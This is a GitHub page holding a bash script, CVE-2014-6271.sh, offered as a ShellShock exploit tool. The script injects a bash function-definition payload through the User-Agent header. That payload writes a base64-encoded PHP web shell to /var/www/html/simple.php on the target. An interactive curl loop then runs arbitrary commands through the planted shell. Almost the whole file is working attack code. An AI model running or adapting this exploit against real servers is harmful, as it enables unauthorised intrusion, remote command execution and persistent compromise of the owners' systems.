-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathCVE-2014-6271.sh
75 lines (67 loc) · 2.82 KB
/
CVE-2014-6271.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/bin/bash
# CVE-2014-6271 : ShellShock Exploit
# https://nvd.nist.gov/vuln/detail/CVE-2014-6271
# This tool uses ShellShock to upload a webshell to the target and uses curl to execute commands through that webshell to provide a terminal like experience.
#
trap '
trap - INT # restore default INT handler
kill -s INT "$$"
' INT
if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ] ; then
# This option displays a help message and command execution examples
echo ""
echo "OsbornePro CVE-2014-6271 1.0 ( https://roberthosborne.com )"
echo ""
echo "USAGE: CVE-2014-6271 -i <target ip> -p <port> -u <uri>"
echo ""
echo "OPTIONS:"
echo " -h : Displays the help information for the command."
echo " -i : Defines the ip address of the target"
echo " -p : Defines the port the web server is running on"
echo " -u : Defines the URI that is exploitable to ShellShock"
echo ""
echo "EXAMPLES:"
echo " CVE-2014-6271 -i 10.10.10.10 -p 8080 -u '/cgi-bin/index.cgi'"
echo " # This example exploits shell shock at http://10.10.10.10.:8080/cgi-bin/index.cgi"
echo ""
exit
fi
while getopts ":i:p:u:" OPT; do
case $OPT in
i) ip=$OPTARG;;
p) port=$OPTARG;;
u) uri=$OPTARG;;
esac
done
if [ -z "$ip" ]
then
printf "[!] Please define the ip address or hostname of the target\n"
exit
fi
if [ -z "$port" ]
then
printf "[*] A valid port was not defined\nSetting default value to 80"
port=80
fi
if [ -z "$uri" ]
then
printf "[*] No uri was defined. Setting default value to /cgi-bin/index.cgi\n"
uri="/cgi-bin/index.cgi"
fi
printf "[*] Sending exploit...\n"
# Encoded in base64 <html><head><h1>tobor</h1></head><body><p><?php echo '<pre>' . shell_exec($_GET ['cmd']) . '</pre>' ;?></p></body></html>
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'echo -en \"PGh0bWw+PGhlYWQ+PGgxPnRvYm9yPC9oMT48L2hlYWQ+PGJvZHk+PHA+PD9waHAgZWNobyAnPHByZT4nIC4gc2hlbGxfZXhlYygkX0dFVCBbJ2NtZCddKSAuICc8L3ByZT4nIDs/PjwvcD48L2JvZHk+PC9odG1sPg==\"| base64 -d > /var/www/html/simple.php'" http://${ip}:${port}${uri} && printf "Webshell has been created at /var/www/html/simple.php\n"
if [ "$ssl" ];
then
while :; do
printf "[php-web-shell>]"
read CMD
curl -sL -k https://$ip:$port/simple.php?cmd=$CMD 2>&1 | sed 's/\(<html><head><h1>tobor<\/h1><\/head><body><p><pre>\|<\/pre>\)//g' | sed 's/\(<\/p><\/body><\/html>\)//g'
done
else
while :; do
printf "[php-web-shell>]"
read CMD
curl -sL http://$ip:$port/simple.php?cmd=$CMD 2>&1 | sed 's/\(<html><head><h1>tobor<\/h1><\/head><body><p><pre>\|<\/pre>\)//g' | sed 's/\(<\/p><\/body><\/html>\)//g'
done
fi